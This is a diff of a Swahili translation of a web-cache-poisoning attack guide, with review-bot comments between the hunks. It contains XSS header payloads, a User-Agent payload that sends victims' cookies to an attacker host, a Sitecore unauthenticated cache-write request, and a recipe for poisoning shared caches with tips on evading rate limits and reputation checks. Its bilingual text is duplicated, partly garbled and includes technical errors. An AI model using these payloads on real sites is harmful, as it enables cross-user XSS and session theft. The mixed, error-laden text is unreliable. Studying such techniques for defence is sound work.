Iwapo unafikiri jibu linawekwa kwenye cache, unaweza kujaribu kutuma maombi yenye header mbaya, ambayo yanapaswa kurejelewa na status code 400. Kisha jaribu kufikia ombi kawaida na ikiwa jibu ni status code 400, unajua ni vunja (na hata unaweza kutekeleza DoS).
Iwapo unadhani jibu linawekwa kwenye cache, unaweza kujaribu **kutuma maombi kwa header mbaya**, ambazo zinapaswa kujibiwa na **status code 400**. Kisha jaribu kufikia ombi kwa kawaida na ikiwa **jibu ni status code 400**, unajua ni dhaifu (na unaweza hata kutekeleza DoS).
You can find more options in:
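Review bot: the replacement step list leaves its bold step names in English ("1. **Identification of Unkeyed Inputs**: Hivi ni vigezo ...", "2. **Exploitation of the Unkeyed Inputs**: ...", "3. **Ensuring the Poisoned Response is Cached**: ...") where the lines it replaces had them in Swahili ("**Kuainisha vigezo visivyotumika kama key**" etc.), and "wakati jibu lime**stored in the cache**" splices an English phrase into a Swahili verb. Pick one convention for the file, and translate the unchanged "You can find more options in:" while here.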
@ -34,45 +34,45 @@ You can find more options in:
cache-poisoning-to-dos.md
{{#endref}}
Hata hivyo, kumbuka kwamba wakati mwingine aina hizi za status codes hazihifadhiwi kwenye cache, kwa hivyo jaribio hili halina uhakika.
Hata hivyo, kumbuka kwamba **mara nyingine misimbo ya aina hizi ya status haijihifadhi kwenye cache** hivyo jaribio hili linaweza kutokuwa la kuaminika.
### Discovery: Identify and evaluate unkeyed inputs
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) kufanyia brute-force parameters na headers ambazo zinaweza kubadilisha jibu la ukurasa. Kwa mfano, ukurasa unaweza kutumia header `X-Forwarded-For` kuonyesha mteja kupakia script kutoka huko:
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) ku**brute-force parameters and headers** ambazo zinaweza **kubadilisha jibu la ukurasa**. Kwa mfano, ukurasa unaweza kutumia header `X-Forwarded-For` kuonyesha client apakie script kutoka pale:
```html
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
```
### Sababisha jibu hatari kutoka kwa back-end server
### Sababisha jibu hatarishi kutoka kwa back-end server
Ukibaini parameter/header, angalia jinsi inavyosafishwa na wapi inarejea au inavyoathiri response kutoka kwa header. Je, unaweza kuitumia vibaya (perform an XSS au load JS unayodhibiti? perform DoS?...)
With the parameter/header identified check how it is being **inayosafishwa** and **wapi** ina **kuonekana** au kuathiri jibu kutoka kwa header. Je, unaweza kuiboresha vibaya (perform an XSS au load JS code unaodhibiti? perform a DoS?...)
### Pata response ikahifadhiwa kwenye cache
### Get the response cached
Mara baada ya kuwa umeya **baini** **page** inayoweza kutumika vibaya, ni **parameter**/**header** gani ya kutumia na **jinsi** ya kuiabusa, unahitaji kuhakikisha ukurasa umehifadhiwa kwenye cache. Kulingana na rasilimali unayotaka kuweka kwenye cache, inaweza kuchukua muda; huenda ukahitaji kujaribu kwa sekunde kadhaa.
Mara tu unapokuwa umebaini ukurasa unaoweza kutumiwa vibaya, parameter/header gani ya kutumia na jinsi ya kuitumia vibaya, unahitaji kupata ukurasa urehitishwe kwenye cache. Kulingana na rasilimali unayojaribu kuweka kwenye cache hii inaweza kuchukua muda, huenda ukahitaji kujaribu kwa sekunde kadhaa.
Header **`X-Cache`** katika response inaweza kuwa muhimu kwani inaweza kuwa na thamani **`miss`** wakati request haikuwekwa kwenye cache na thamani **`hit`** wakati imehifadhiwa.\
Header **`Cache-Control`** pia ni muhimu kujua ikiwa rasilimali inawekwa kwenye cache na ni lini itahifadhiwa tena: `Cache-Control: public, max-age=1800`
The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`
Header nyingine ya kuvutia ni **`Vary`**. Header hii mara nyingi hutumika kuonyesha **headers za ziada** zinazochukuliwa kama **sehemu ya cache key** hata kama kawaida hazizingatiiwi kama key. Kwa hivyo, ikiwa mshambuliaji anajua `User-Agent` ya mwathiriwa anayemlenga, anaweza poison the cache kwa watumiaji wanaotumia `User-Agent` hiyo.
Another interesting header is **`Vary`**. This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.
Header nyingine inayohusiana na cache ni **`Age`**. Inabainisha muda kwa sekunde ambao kitu kimekuwa katika proxy cache.
One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
Unapohifadhi request kwenye cache, kuwa **makini na headers unazotumia** kwa sababu baadhi yao yanaweza **kutumika bila kutarajiwa** kama **keyed** na **mwathiriwa atahitaji kutumia header hiyo hiyo**. Daima **jaribu** Cache Poisoning kwa **browsers tofauti** ili uhakikishe inafanya kazi.
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
## Mifano ya Exploiting
## Exploiting Examples
### Mfano rahisi zaidi
### Mfano rahisi
Header kama `X-Forwarded-For` inarejea kwenye response bila kusafishwa.\
Unaweza kutuma payload ya msingi ya XSS na poison the cache ili kila mtu anayefungua ukurasa apate XSS:
A header like `X-Forwarded-For` is being reflected in the response unsanitized.\
You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed:
```html
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
```
_Kumbuka kwamba hii itapoison ombi kwa `/en?region=uk` si kwa `/en`_
_Kumbuka kwamba hii itapoisina ombi la `/en?region=uk` si la `/en`_
### Cache poisoning to DoS
### Cache poisoning kwa DoS
{{#ref}}
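Review bot: the "Mfano rahisi" example is internally inconsistent: the text says a header like `X-Forwarded-For` is reflected unsanitized, but the request below injects the payload through `X-Forwarded-Host: a."><script>alert(1)</script>"`; use the same header in both places. Separately, this hunk replaces Swahili lines with English ("### Get the response cached", "The header **`X-Cache`** in the response could be very useful ...", "Another interesting header is **`Vary`** ...", "When caching a request, be **careful with the headers you use** ...", "A header like `X-Forwarded-For` is being reflected ..."), and "check how it is being **inayosafishwa** and **wapi** ina **kuonekana**" mixes both languages in one sentence; keep the fully Swahili versions it replaces.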
@ -81,23 +81,23 @@ cache-poisoning-to-dos.md
### Cache poisoning through CDNs
Katika **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** inaelezea tukio rahisi lifuatalo:
In **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** inaeleza tukio rahisi lifuatayo:
- CDN itakayocache chochote chini ya `/share/`
- CDN haitadecode wala haitanormalize `%2F..%2F`, kwa hivyo inaweza kutumika kama **path traversal to access other sensitive locations that will be cached** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
- Server ya wavuti WILL decode and normalize `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **ina auth token**.
- CDN itacache chochote chini ya `/share/`
- CDN HAITA decode wala normalize `%2F..%2F`, kwa hivyo, inaweza kutumika kama **path traversal to access other sensitive locations that will be cached** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
- web server ITADECODE na ITANORMALIZE `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **contains the auth token**.
### Using web cache poisoning to exploit cookie-handling vulnerabilities
### Kutumia web cache poisoning ku-exploit cookie-handling vulnerabilities
Cookies pia zinaweza kuonekana katika response ya ukurasa. Ikiwa unaweza kuabuse hilo kusababisha XSS, kwa mfano, unaweza ku-exploit XSS katika clients kadhaa zinazopakia malicious cache response.
Cookies pia zinaweza kuonyeshwa kwenye response ya ukurasa. Ikiwa unaweza kuziabusi (abuse) kusababisha XSS kwa mfano, ungeweza ku-exploit XSS katika wateja kadhaa ambao wanapakia malicious cache response.
```html
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
```
Kumbuka kwamba ikiwa cookie iliyo hatarini inatumiwa mara kwa mara na watumiaji, maombi ya kawaida yataosha cache.
Kumbuka kwamba ikiwa cookie yenye udhaifu inatumiwa sana na watumiaji, maombi ya kawaida yatasababisha cache kusafishwa.
### Generating discrepancies with delimiters, normalization and dots <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### Kutengeneza tofauti kwa delimiters, normalization na dots <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
Angalia:
@ -108,18 +108,18 @@ cache-poisoning-via-url-discrepancies.md
### Cache poisoning with path traversal to steal API key <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
[**This writeup explains**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba OpenAI API key kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitabebwa bila Cloudflare normalising the URL, ambayo ilifanywa wakati ombi lilipofika kwenye web server.
[**Uandishi huu unaelezea**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba OpenAI API key kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitapigwa cache bila Cloudflare kurekebisha URL, hatua ambayo ilifanyika wakati ombi lilipofika kwenye web server.
Hii pia imeelezewa vyema katika:
Hii pia inaelezewa vizuri zaidi katika:
{{#ref}}
cache-poisoning-via-url-discrepancies.md
{{#endref}}
### Using multiple headers to exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### Kutumia multiple headers ili ku-exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
Wakati mwingine utahitaji **exploit several unkeyed inputs** ili uweze abuse cache. Kwa mfano, unaweza kupata an **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa domain unayodhibiti na `X-Forwarded-Scheme` kuwa `http`. Ikiwa **server** inafanya **forwarding** maombi yote ya **HTTP** **to HTTPS** na inatumia header `X-Forwarded-Scheme` kama jina la domain kwa redirect, unaweza kudhibiti wapi ukurasa unaelekezwa na redirect.
Wakati mwingine utahitaji **exploit several unkeyed inputs** ili uweze ku-abuse cache. Kwa mfano, unaweza kupata an **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa domain unayodhibiti na `X-Forwarded-Scheme` kwa `http`. **If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as the domain name for the redirect, unaweza kudhibiti mahali ukurasa utaelekezwa na redirect.
```html
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
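Review bot: in "Wakati mwingine utahitaji **exploit several unkeyed inputs** ..." both versions say the server uses `X-Forwarded-Scheme` as the domain name for the redirect, but that header only carries `http`/`https`; the header that supplies the host in this scenario is `X-Forwarded-Host`, which the same sentence already sets to the attacker-controlled domain, so it should read "using `X-Forwarded-Host` as the domain name for the redirect". The replacement line also keeps "**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** ..." in English mid-sentence; translate it as the line it replaces does.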
@ -128,7 +128,7 @@ X-Forwarded-Scheme: http
```
### Kutumia `Vary`header iliyopunguzwa
Ikiwa umegundua kwamba **`X-Host`** header inatumika kama **jina la domaini kupakia rasilimali ya JS** lakini header ya **`Vary`** katika jibu inaonyesha **`User-Agent`**. Kisha, unahitaji kupata njia ya exfiltrate `User-Agent` ya mwanaathirika na poison the cache ukitumia `User-Agent` huo:
Ikiwa umegundua kuwa header ya **`X-Host`** inatumiwa kama **domain name to load a JS resource** lakini header ya **`Vary`** katika jibu inaonyesha **`User-Agent`**, basi unahitaji kupata njia ya exfiltrate User-Agent ya victim na poison the cache ukitumia user agent hiyo:
```html
GET / HTTP/1.1
Host: vulnerbale.net
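Review bot: the heading "### Kutumia `Vary`header iliyopunguzwa" is missing the space after the closing backtick (`Vary` header), and the example request's "Host: vulnerbale.net" is a typo for vulnerable.net worth fixing in passing even though that line is unchanged.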
@ -137,7 +137,7 @@ X-Host: attacker.com
```
### Fat Get
Tuma GET request yenye request katika URL na katika body. Ikiwa web server inatumia ile kutoka body lakini cache server inahifadhi ile kutoka URL, yeyote anayefikia URL hiyo atatumia parameter kutoka body. Kama vile vuln James Kettle alipogundua kwenye Github website:
Tuma GET request ambapo request iko kwenye URL na pia kwenye body. Ikiwa web server inatumia ile kutoka body lakini cache server inakasha ile kutoka URL, yeyote anayetembelea URL hiyo ataitumia parameter kutoka body. Kama vuln aliyogunduliwa na James Kettle kwenye Github website:
```
GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
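Review bot: "cache server inakasha ile kutoka URL" introduces "inakasha", a word the rest of the file does not use for caching; the line it replaces has "inahifadhi ile kutoka URL", and "inahifadhi kwenye cache" keeps terminology consistent with the other sections.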
@ -146,39 +146,39 @@ Content-Length: 22
report=innocent-victim
```
Kuna labu ya PortSwigger kuhusu hili: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
Kuna lab ya PortSwigger kuhusu hili: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
### Parameter Cloacking
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
Kwa mfano, inawezekana kutenganisha **parameters** kwenye ruby servers kwa kutumia herufi **`;`** badala ya **`&`**. Hii inaweza kutumiwa kuweka thamani za parameters zisizo na ufunguo ndani ya zile zilizo na ufunguo na kuzitumia vibaya.
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
Jifunze hapa kuhusu jinsi ya kufanya [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
Jifunze hapa jinsi ya kufanya [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
### Upimaji wa otomatiki kwa Web Cache Poisoning
### Upimaji otomatiki wa Web Cache Poisoning
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) inaweza kutumiwa kupima otomatiki kwa web cache poisoning. Inasaidia mbinu nyingi tofauti na inaweza kubinafsishwa kwa kiasi kikubwa.
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) inaweza kutumika kupima kiotomatiki web cache poisoning. Inasaidia mbinu nyingi tofauti na inaweza kubadilishwa kwa urahisi.
Mfano wa matumizi: `wcvs -u example.com`
Example usage: `wcvs -u example.com`
### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js)
Mfano huu wa ulimwengu halisi unaunganisha primitive ya header-based reflection na tabia ya CDN/WAF ili kwa kuaminika ku-poison HTML iliyohifadhiwa (cached) inayotumiwa kwa watumiaji wengine:
Mfumo huu wa ulimwengu halisi unaunganisha primitive ya reflection inayotokana na header na tabia za CDN/WAF ili kwa uhakika poison the cached HTML inayotolewa kwa watumiaji wengine:
- HTML kuu iliakisi header ya request isiyoaminika (kwa mfano, `User-Agent`) ndani ya executable context.
- CDN iliondoa cache headers lakini kulikuwepo cache ya internal/origin. CDN pia ili-auto-cache requests zinazomalizika kwa extensions za static (kwa mfano, `.js`), wakati WAF ilitumia ukaguzi mdogo wa maudhui kwa GETs za static assets.
- Mabadiliko ya mtiririko wa requests yaliwezesha request kwa njia ya `.js` kuathiri cache key/variant iliyotumika kwa HTML kuu iliyofuata, hivyo kuwezesha cross-user XSS kupitia header reflection.
- The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context.
- The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets.
- Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection.
Mapishi ya vitendo (iliyoshuhudiwa kwenye CDN/WAF maarufu):
Practical recipe (observed across a popular CDN/WAF):
1) Kutoka IP safi (epuka prior reputation-based downgrades), weka `User-Agent` yenye uhasama kupitia browser au Burp Proxy Match & Replace.
2) Katika Burp Repeater, andaa kundi la requests mbili na tumia "Send group in parallel" (single-packet mode works best):
- Request ya kwanza: GET njia ya rasilimali ya `.js` kwenye origin ileile huku ukituma `User-Agent` yako yenye uhasama.
- Mara moja baada yake: GET ukurasa mkuu (`/`).
3) Mbio za routing za CDN/WAF pamoja na `.js` iliyohifadhiwa kwa otomatiki mara nyingi huzaa variant ya HTML iliyopoisona katika cache ambayo kisha hutumika kwa wageni wengine wanaoshiriki masharti yale yale ya cache key (kwa mfano, same `Vary` dimensions like `User-Agent`).
1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace.
2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best):
- First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`.
- Immediately after: GET the main page (`/`).
3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`).
Mfano wa header payload (to exfiltrate non-HttpOnly cookies):
```
@ -186,30 +186,30 @@ User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oas
```
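Review bot: the payload for this recipe survives only in the hunk header (`@ -186,30 +186,30 @@ User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oas`), cut off at `attacker.oas`, so please confirm the committed file still carries the complete `User-Agent` line inside the fence and not just the opening and closing backticks. Separately, this region ships the same text twice in two languages: `Mfano wa matumizi: \`wcvs -u example.com\`` beside `Example usage: \`wcvs -u example.com\``, the three "The main HTML reflected an untrusted request header" bullets beside their Swahili counterparts, and the numbered recipe (`1) From a clean IP ...`) beside `1) Kutoka IP safi ...`. Whichever side is kept, a Swahili page should not carry untranslated English paragraphs. One wording point in step 3: it says the poisoned variant reaches visitors "sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`)", but if the cache really keys on `User-Agent` only clients sending the attacker's exact header would hit that entry; the sentence should state what the shared key actually is (or that the CDN ignores `Vary` in this setup).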
Operational tips:
- CDNs nyingi huficha cache headers; poisoning inaweza kuonekana tu kwenye mizunguko ya refresh ya masaa mengi. Tumia multiple vantage IPs na throttle ili kuepuka rate-limit au reputation triggers.
- Kutumia IP kutoka cloud ya CDN mwenyewe wakati mwingine huboresha routing consistency.
- Ikiwa kuna CSP kali, bado inafanya kazi ikiwa reflection inaendeshwa katika main HTML context na CSP inaruhusu inline execution au inapitiwa na context.
- Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers.
- Using an IP from the CDN's own cloud sometimes improves routing consistency.
- If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context.
Impact:
- Ikiwa session cookies si `HttpOnly`, zero-click ATO inawezekana kwa mass-exfiltrating `document.cookie` kutoka kwa watumiaji wote wanaopokelewa poisoned HTML.
- If session cookies arent `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML.
Defenses:
- Acha ku-reflect request headers ndani ya HTML; context-encode kwa ukali ikiwa haiwezi kuepukika. Linganisha sera za cache za CDN na origin na epuka ku-vary kwa headers zisizoaminika.
- Hakikisha WAF inatumia content inspection kwa uthabiti kwa `.js` requests na static paths.
- Weka `HttpOnly` (na `Secure`, `SameSite`) kwenye session cookies.
- Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers.
- Ensure WAF applies content inspection consistently to `.js` requests and static paths.
- Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies.
### Sitecore preauth HTML cache poisoning (unsafe XAML Ajax reflection)
Mfumo maalum wa Sitecore huruhusu uandishi usioidhinishwa kwenye HtmlCache kwa kutumia vibaya preauth XAML handlers na AjaxScriptManager reflection. Wakati handler ya `Sitecore.Shell.Xaml.WebControl` inafikiwa, `xmlcontrol:GlobalHeader` (iliyotokana na `Sitecore.Web.UI.WebControl`) inapatikana na wito wa reflective ufuatao unaruhusiwa:
A Sitecorespecific pattern enables unauthenticated writes to the HtmlCache by abusing preauth XAML handlers and AjaxScriptManager reflection. When the `Sitecore.Shell.Xaml.WebControl` handler is reached, an `xmlcontrol:GlobalHeader` (derived from `Sitecore.Web.UI.WebControl`) is available and the following reflective call is allowed:
```
POST /-/xaml/Sitecore.Shell.Xaml.WebControl
Content-Type: application/x-www-form-urlencoded
__PARAMETERS=AddToCache("key","<html>…payload…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
Hii inaandika HTML yoyote chini ya cache key iliyochaguliwa na mshambuliaji, ikiruhusu precise poisoning mara cache keys zinapojulikana.
Hii inaandika arbitrary HTML chini ya cache key iliyochaguliwa na mshambuliaji, ikiruhusu precise poisoning mara cache keys zinapojulikana.
For full details (cache key construction, ItemService enumeration and a chained postauth deserialization RCE):
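Review bot: the Defenses list presents `HttpOnly` as if it addressed the finding, but per the Impact paragraph (`zero-click ATO is possible by mass-exfiltrating document.cookie`) it only removes cookie theft as an outcome; the reflection itself is still an XSS, so the bullet should read as an impact-limiting control, with "Stop reflecting request headers into HTML" as the actual fix. The Operational tips, Impact and Defenses bullets each appear in Swahili and then again in English; keep one language. In the Sitecore paragraph, `Hii inaandika arbitrary HTML chini ya cache key` keeps the English "arbitrary" inside Swahili prose where the sibling line already has `HTML yoyote`; prefer the fully Swahili form.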
@ -217,39 +217,39 @@ For full details (cache key construction, ItemService enumeration and a chained
../../network-services-pentesting/pentesting-web/sitecore/README.md
{{#endref}}
## Mifano Inayoweza Kuathiriwa
## Mifano Yenye Udhaifu
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
ATS ilituma fragment ndani ya URL bila kuiondoa na ikatengeneza cache key ikitumia tu host, path na query (ikisingiza fragment). Hivyo ombi `/#/../?r=javascript:alert(1)` lilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na cache key haikuwa na payload ndani yake, ilikuwa na host, path na query tu.
ATS ilipeleka fragment ndani ya URL bila kuifuta na ilitengeneza cache key ikitumia tu host, path and query (ikiepuka fragment). Kwa hivyo request `/#/../?r=javascript:alert(1)` ilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na cache key haikujumuisha payload ndani yake, ilikuwa tu host, path and query.
### GitHub CP-DoS
Kutuma thamani mbaya kwenye content-type header ilisababisha response ya 405 iliyohifadhiwa (cached). Cache key ilijumuisha cookie hivyo ilikuwa inawezekana kushambulia tu unauth users.
Kutuma thamani mbaya kwenye header ya content-type ilisababisha majibu ya 405 yaliyohifadhiwa kwenye cache. Cache key ilijumuisha cookie, hivyo ilikuwa inawezekana kushambulia tu watumiaji wasiothibitishwa.
### GitLab + GCP CP-DoS
GitLab inatumia GCP buckets kuhifadhi static content. **GCP Buckets** zinaunga mkono header **`x-http-method-override`**. Kwa hivyo ilikuwa inawezekana kutuma header `x-http-method-override: HEAD` na poison the cache ili irudishe response body tupu. Pia inaweza kusaidia method `PURGE`.
GitLab inatumia GCP buckets kuhifadhi static content. **GCP Buckets** support the **header `x-http-method-override`**. Hivyo ilikuwa inawezekana kutuma header `x-http-method-override: HEAD` na poison the cache into returning an empty response body. Inaweza pia kuunga mkono method `PURGE`.
### Rack Middleware (Ruby on Rails)
Katika applications za Ruby on Rails, Rack middleware mara nyingi hutumika. Kusudi la code ya Rack ni kuchukua thamani ya header **`x-forwarded-scheme`** na kuiweka kama scheme ya request. Wakati header `x-forwarded-scheme: http` inapotumwa, hutokea redirect ya 301 kwenda eneo lile lile, jambo ambalo linaweza kusababisha Denial of Service (DoS) kwa rasilimali hiyo. Zaidi ya hayo, application inaweza kutambua header `X-forwarded-host` na kuwarudisha watumiaji kwenye host iliyotajwa. Tabia hii inaweza kusababisha kupakia kwa faili za JavaScript kutoka kwenye server ya mshambuliaji, na hivyo kuleta hatari ya usalama.
Katika applications za Ruby on Rails, Rack middleware mara nyingi hutumika. Kusudi la Rack code ni kuchukua thamani ya **`x-forwarded-scheme`** header na kuiweka kama scheme ya request. Wakati header `x-forwarded-scheme: http` imetumwa, redirect ya 301 kwenda location ileile inatokea, ambayo inaweza kusababisha Denial of Service (DoS) kwa resource hiyo. Zaidi ya hayo, application inaweza kutambua `X-forwarded-host` header na kuelekeza watumiaji kwenye host iliyobainishwa. Tabia hii inaweza kusababisha ku-loading kwa JavaScript files kutoka kwa server ya mshambuliaji, ikileta hatari ya usalama.
### 403 and Storage Buckets
Cloudflare hapo awali ilihakikisha (cached) majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa Authorization headers zisizo sahihi kungepelekea jibu la 403 ambalo lilihifadhiwa. Ingawa Cloudflare imeacha caching ya majibu ya 403, tabia hii inaweza bado kuwepo katika proxy services zingine.
Cloudflare hapo awali ilihifadhi (cache) majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa Authorization headers zisizo sahihi kunasababisha majibu ya 403 ambayo yalihifadhiwa kwenye cache. Ingawa Cloudflare imeacha caching majibu ya 403, tabia hii bado inaweza kuwepo kwenye proxy services nyingine.
### Injecting Keyed Parameters
Caches mara nyingi hujumuisha parameters maalum za GET kwenye cache key. Kwa mfano, Varnish ya Fastly ilihakikisha parameter ya `size` katika requests. Hata hivyo, kama toleo lililotumwa kwa URL-encoding la parameter (mfano, `siz%65`) lililetwa pia na thamani isiyo sahihi, cache key ingejengwa kwa kutumia parameter sahihi ya `size`. Hata hivyo, backend itashughulikia thamani katika parameter iliyokuwa URL-encoded. Kufanya URL-encoding kwa parameter ya pili `size` kulisababisha kutokujumuishwa kwake na cache lakini kutumika na backend. Kuipa thamani ya 0 parameter hii kulipelekea kosa la 400 Bad Request ambalo lingeweza kuhifadhiwa na cache.
Caches mara nyingi hujumuisha specific GET parameters katika cache key. Kwa mfano, Fastly's Varnish cached the `size` parameter in requests. Hata hivyo, kama version iliyokuwa URL-encoded ya parameter (mfano `siz%65`) ilitumwa pia na thamani isiyo sahihi, cache key ingejengwa ikitumia parameter sahihi ya `size`. Lakini backend ingefanya process ya thamani iliyomo kwenye parameter iliyouzwa. URL-encoding ya parameter ya pili ya `size` ilisababisha kutokujumuishwa kwake na cache lakini kutumika na backend. Kutoa thamani 0 kwa parameter hii ilizalisha cacheable 400 Bad Request error.
### User Agent Rules
Baadhi ya developers huzuia requests zenye user-agents zinazolingana na zana za trafiki kubwa kama FFUF au Nuclei ili kudhibiti mzigo wa server. Kwa uwazi, njia hii inaweza kuleta udhaifu kama cache poisoning na DoS.
Baadhi ya developers huzuia requests zenye user-agents zinazolingana na za tools zenye traffic kubwa kama FFUF au Nuclei ili kudhibiti server load. Kwa mshangao, njia hii inaweza kuleta udhaifu kama cache poisoning na DoS.
### Illegal Header Fields
[https://datatracker.ietf.mrg/doc/html/rfc7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inabainisha characters zinazoruhusiwa kwenye header names. Headers zenye characters zisizo ndani ya range ya **tchar** kwa kawaida zinapaswa kusababisha jibu la 400 Bad Request. Katika utekelezaji, servers si kila wakati zinafuata standard hii. Mfano muhimu ni Akamai, ambayo inapeleka headers zenye characters zisizo halali na inahifadhi (cache) kosa lolote la 400, mradi tu header `cache-control` haipo. Muundo unaoweza kutumika ulitambuliwa ambapo kutuma header yenye character isiyokubalika, kama `\`, kungepelekea kosa la 400 Bad Request linaloweza kuhifadhiwa na cache.
[https://datatracker.ietf.mrg/doc/html/rfc7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inaeleza characters zinazokubaliwa katika header names. Headers zenye characters nje ya range ya **tchar** zinapaswa kwa dhana kusababisha 400 Bad Request. Katika vitendo, servers hazizingatii standard hii kila mara. Mfano muhimu ni Akamai, ambayo inapitisha headers zenye characters zisizo halali na hufanya cache kwa error yoyote ya 400, mradi tu header `cache-control` haipo. Mchoro unaoweza kutumika ulitambuliwa ambapo kutuma header yenye character isiyo halali, kama `\`, kungepelekea cacheable 400 Bad Request error.
### Kupata headers mpya
